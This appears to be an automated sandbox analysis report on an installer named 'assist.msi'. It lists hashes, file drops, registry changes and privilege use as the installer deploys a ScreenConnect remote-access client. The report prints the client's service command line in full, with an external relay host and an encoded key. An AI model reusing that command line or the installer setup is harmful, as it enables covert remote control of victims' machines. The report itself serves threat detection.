Analysis
-
max time kernel
1493s -
max time network
1503s -
platform
windows11-21h2_x64 -
resource
win11-20240319-en -
resource tags
arch:x64arch:x86image:win11-20240319-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/04/2024, 11:24
Static task
static1
Behavioral task
behavioral1
Sample
assist.msi
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
assist.msi
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
assist.msi
Resource
win11-20240319-en
General
-
Target
assist.msi
-
Size
2.8MB
-
MD5
0c61143cdd787c28fa456b33834d1513
-
SHA1
56a157b6081b5f21b9b7f637c2de98558062485c
-
SHA256
ab17098a430aacf82f5c33d5cb6156f23525623815eb63fbc0e969cb38b59fea
-
SHA512
02f2fce34bdd9db6c51b2b4466c95270c6d94d80e76153fcd7bb6233653e86f9f9b16abb29c86b7b5ce69daeaf99e75abf04025bd7bc4ed95caa5e1f0d978b74
-
SSDEEP
49152:FGN8erCckNGjQq7DODBzl01h6K4dYdJSN52GcPmfLKyrOxRnEOJk1g:0qe9kNDqnS2wdYdsSG1f2yrOnTJk
Malware Config
Signatures
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (12e6ae703360b1e5)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (12e6ae703360b1e5)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=aloha-assist.com&p=443&s=246490b7-13ac-4d7e-8249-aa9aa516f2a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBRXVM%2f0zYukVOauF8gEYOCB0rCvmoWG%2bh46z7gQzdgnkGPtzjrebucQeKkm8qsbi5X0y0VsCHHG1XEDoURZH95JQnNkl%2f3tx3ViglzRdDhOa%2b5Nfob4XRPDBxwODOgX4IJZZJO3AnA9MX3RLhFapfmPCQjDYCbUowQ9cTiAObWHp4Se5EEf%2fbuvrXFiEwGau1ceiB0nuVtY9s%2fbxbyQSqiQywHYIBKc0MEgkS7EZelWCymok5wktn1Sf2vX9lSb7Lyyz7OV%2bQnrz%2fkwJjI84r5xQ0j1TRd8AYaN%2bL6KVUI0SZiP4mh5T2%2b08pFoKrPy02ScVcoQtd9Ht9fOnigbfav&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA6RaraRvCZkaqcM8SLKfrnwAAAAACAAAAAAAQZgAAAAEAACAAAABU4zzD6erhs%2bq4xHoQjTpHYxEfvhPcSvu36Izs2o8%2ftAAAAAAOgAAAAAIAACAAAABEviaYQ2szWMWX5d4qXKyNdlwHMab%2bD8nGGm7ayo1FB6AEAAAOJnIGIlj8%2bRWUVXNPr%2bz120VlVw%2fh4OFEu5Ym5mOjAMMWxVhCNCnwMRiYjC4aucyWCXDVzUJ6Jt7rkePBvo1T6e504G34zvDwRGH3OxO6%2fBYbg94rNuyvvLwzZHFysyPIlC%2bhYo79%2bjXpnJwfU%2fuFAPX3f68CVmQNYhy4FblRAZZtohkVZ84H2h7Ajxfc95pgI%2bC4QMiT56DME5mfYwN4lvO5rZfINRhiTwhyxg6pVRjZDNaAtnsHp6C8Q0fw52ME%2bxXvygnJbZukis0w3qwCw%2f2QruE4s%2bLPW1%2bDHygVQoXMsZw1N115aunvF1cD2v%2bjZX8rzABzfjnyyki%2bzgU6I0PPSTV%2f4P5dg5fLerVTPcyb%2bSRGDq6KeRfLqHTboOp8GX9Sd1QRK%2bP7tYam%2bOJX81tBtLxDmknDxxhr6emhIImcbLij1ReJKHdG0YWjLpSFZJn6t2XjrjsPfTf%2bavSX30VpJsgTwnzSG40W40jh0Mn2sKn9CIcOBFaQ8%2fqSrJR2hFhc5nb5jTHwhheMd1DYCVcQxEXyIfycyjHFMCKwHrUqc79mNVJZkoQbKIgZxMV6Vg7VFw%2bnmzj19MB4Qc4DO0dS22gO5KKGd9AKEYnIVLUeIWfHNh7Zv%2biD0VUiM%2f5JMlKeJAfehgk%2fFRttocG4grOdhfy6sVRP6HC4Q6AYSZrJGcG7m1t6346%2bA2dzmg4%2bsmVP8njYOOJ5WFjfR%2fl5ZRh8Nx2xKl7w1i5Y64Wyh9sEysg2F8xcBoAZW8UscTNrmkU1o%2ba54h94GY87EvE1wGk1NIj%2bvxLWVZk65OieU6ZyVCNhNpjOzOOwUZZu3D5Xn8MRCL8fVx2tecEY1X1kvUOXMUmnGN3lzhj0mbwzR6DJFJ2h1qeEhxy2ChLNICoUsstmf63BG1sN4WqoF%2fzYkRC1Ps1A5Chkb4mgtGjZ2yf%2fPgHuwTtKld%2fUWeiTONJtzn1W4hBLxZrFvKbe4EEAuspB0M8m4Q0wsTUxC6jEEzamAxM3WhNl0Yjbv9%2fQaCOGP%2bGA2hOcpdUr%2ffucj0r1B1DU8s6KUFTxUZZ%2bNvN5MEGwuG%2bUHbLCIdwqWQsJlt9%2fPH4fgohFdOSTIRBiNeauQabjcElpYEtQ8pUT9LomGc%2b1hIFajSP3otxppRa5NVcytY5qqP%2bmiypoV41T5cQnwmLuO3evtUsJDMDLvQyg5Mh3D7ji4pBEAe3O6ZO%2bXwjqHeIOouW1d97oCcTRu9TF51Tw6nCLJ4RUXV0cVb58142kNdvgL92WyqvpB%2fo5sFHDgth08KPyarahT5DZTw9IU6ONNEzSx0XpeoRywy2E5BOpvL%2fLxWkD5v89bvdvcdeETgSWylTdiEzvUSsZfxjcc%2f1TB38V9nrLxxs6p2upzpXlXFXKkSWD2PdLTDGHYutsco0gawEO3L4MtgxXrDqF5FadtGVWRJgDlnudW2y046Fctm76sMH%2bUsxWUtFl0vup%2fWXjUmZO5UWFWiwyoxbo72cK34f84hLykzqrG8Sqg4zYtj4d8t6GqzmsZTTdyfvrwPrWnolIKylJI6SIZFZvN3fHvWXl4AVBA2MJK8YfYUAAAABpt0AT5nFHAaRlQPxfbh3DGrtOQtgSZ6ZlyQp10fKcQ4E866dfQzYKgWWC%2bQerqhQ5Oh5sRtO6Ylof55si80IO&c=admin1&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\ptp3s23p.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\o0dk22lm.tmp ScreenConnect.ClientService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\o0dk22lm.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\ptp3s23p.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\2bccoo55.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\cwitybcl.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\cwitybcl.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\3g5noczp.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\3g5noczp.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\user.config ScreenConnect.ClientService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\3g5noczp.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\o0dk22lm.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\2bccoo55.tmp ScreenConnect.ClientService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\2bccoo55.newcfg ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\cwitybcl.tmp ScreenConnect.ClientService.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\Client.en-US.resources msiexec.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File created C:\Windows\Installer\wix{4F2D03AB-B994-41D9-9D8C-89AC929B86F4}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\{4F2D03AB-B994-41D9-9D8C-89AC929B86F4}\DefaultIcon msiexec.exe File created C:\Windows\Installer\e57c861.msi msiexec.exe File created C:\Windows\Installer\e57c863.msi msiexec.exe File opened for modification C:\Windows\Installer\{4F2D03AB-B994-41D9-9D8C-89AC929B86F4}\DefaultIcon msiexec.exe File created C:\Windows\SystemTemp\~DF0951F37A9D8D6173.TMP msiexec.exe File opened for modification C:\Windows\Installer\e57c861.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFB2F506C1F3D23497.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC9C8.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4819A0A0A67830F8.TMP msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{4F2D03AB-B994-41D9-9D8C-89AC929B86F4} msiexec.exe File created C:\Windows\SystemTemp\~DF1441101AEA7684DB.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC9D9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICB8F.tmp msiexec.exe -
Executes dropped EXE 2 IoCs
pid Process 3636 ScreenConnect.ClientService.exe 4708 ScreenConnect.WindowsClient.exe -
Loads dropped DLL 20 IoCs
pid Process 4456 MsiExec.exe 788 rundll32.exe 788 rundll32.exe 788 rundll32.exe 788 rundll32.exe 788 rundll32.exe 788 rundll32.exe 788 rundll32.exe 2888 MsiExec.exe 1368 MsiExec.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe -
Registers COM server for autorun 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (12e6ae703360b1e5)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d7c5157aa3afd7f30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d7c5157a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d7c5157a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd7c5157a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d7c5157a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies data under HKEY_USERS 9 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 msiexec.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (12e6ae703360b1e5)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\PackageCode = "97EA4DE1F63E4ED41BDA0FCA9881B6C0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\Version = "386007049" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\Assignment = "1" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\ = "ScreenConnect Client (12e6ae703360b1e5) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\BA30D2F4499B9D14D9C898CA29B9684F msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\69A686A05E0BAD58216EEA0733061B5E\BA30D2F4499B9D14D9C898CA29B9684F msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\shell msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-12e6ae703360b1e5\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-12e6ae703360b1e5 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-0A5F-0EA704A4C255}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\ProductName = "ScreenConnect Client (12e6ae703360b1e5)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\ProductIcon = "C:\\Windows\\Installer\\{4F2D03AB-B994-41D9-9D8C-89AC929B86F4}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (12e6ae703360b1e5)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\69A686A05E0BAD58216EEA0733061B5E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\PackageName = "assist.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BA30D2F4499B9D14D9C898CA29B9684F\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-12e6ae703360b1e5 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\BA30D2F4499B9D14D9C898CA29B9684F\Full msiexec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4708 ScreenConnect.WindowsClient.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1528 msiexec.exe 1528 msiexec.exe 3636 ScreenConnect.ClientService.exe 3636 ScreenConnect.ClientService.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeSecurityPrivilege 1528 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1840 msiexec.exe Token: SeLockMemoryPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeMachineAccountPrivilege 1840 msiexec.exe Token: SeTcbPrivilege 1840 msiexec.exe Token: SeSecurityPrivilege 1840 msiexec.exe Token: SeTakeOwnershipPrivilege 1840 msiexec.exe Token: SeLoadDriverPrivilege 1840 msiexec.exe Token: SeSystemProfilePrivilege 1840 msiexec.exe Token: SeSystemtimePrivilege 1840 msiexec.exe Token: SeProfSingleProcessPrivilege 1840 msiexec.exe Token: SeIncBasePriorityPrivilege 1840 msiexec.exe Token: SeCreatePagefilePrivilege 1840 msiexec.exe Token: SeCreatePermanentPrivilege 1840 msiexec.exe Token: SeBackupPrivilege 1840 msiexec.exe Token: SeRestorePrivilege 1840 msiexec.exe Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeDebugPrivilege 1840 msiexec.exe Token: SeAuditPrivilege 1840 msiexec.exe Token: SeSystemEnvironmentPrivilege 1840 msiexec.exe Token: SeChangeNotifyPrivilege 1840 msiexec.exe Token: SeRemoteShutdownPrivilege 1840 msiexec.exe Token: SeUndockPrivilege 1840 msiexec.exe Token: SeSyncAgentPrivilege 1840 msiexec.exe Token: SeEnableDelegationPrivilege 1840 msiexec.exe Token: SeManageVolumePrivilege 1840 msiexec.exe Token: SeImpersonatePrivilege 1840 msiexec.exe Token: SeCreateGlobalPrivilege 1840 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1840 msiexec.exe Token: SeLockMemoryPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeMachineAccountPrivilege 1840 msiexec.exe Token: SeTcbPrivilege 1840 msiexec.exe Token: SeSecurityPrivilege 1840 msiexec.exe Token: SeTakeOwnershipPrivilege 1840 msiexec.exe Token: SeLoadDriverPrivilege 1840 msiexec.exe Token: SeSystemProfilePrivilege 1840 msiexec.exe Token: SeSystemtimePrivilege 1840 msiexec.exe Token: SeProfSingleProcessPrivilege 1840 msiexec.exe Token: SeIncBasePriorityPrivilege 1840 msiexec.exe Token: SeCreatePagefilePrivilege 1840 msiexec.exe Token: SeCreatePermanentPrivilege 1840 msiexec.exe Token: SeBackupPrivilege 1840 msiexec.exe Token: SeRestorePrivilege 1840 msiexec.exe Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeDebugPrivilege 1840 msiexec.exe Token: SeAuditPrivilege 1840 msiexec.exe Token: SeSystemEnvironmentPrivilege 1840 msiexec.exe Token: SeChangeNotifyPrivilege 1840 msiexec.exe Token: SeRemoteShutdownPrivilege 1840 msiexec.exe Token: SeUndockPrivilege 1840 msiexec.exe Token: SeSyncAgentPrivilege 1840 msiexec.exe Token: SeEnableDelegationPrivilege 1840 msiexec.exe Token: SeManageVolumePrivilege 1840 msiexec.exe Token: SeImpersonatePrivilege 1840 msiexec.exe Token: SeCreateGlobalPrivilege 1840 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1840 msiexec.exe Token: SeLockMemoryPrivilege 1840 msiexec.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 1840 msiexec.exe 1840 msiexec.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe -
Suspicious use of SendNotifyMessage 15 IoCs
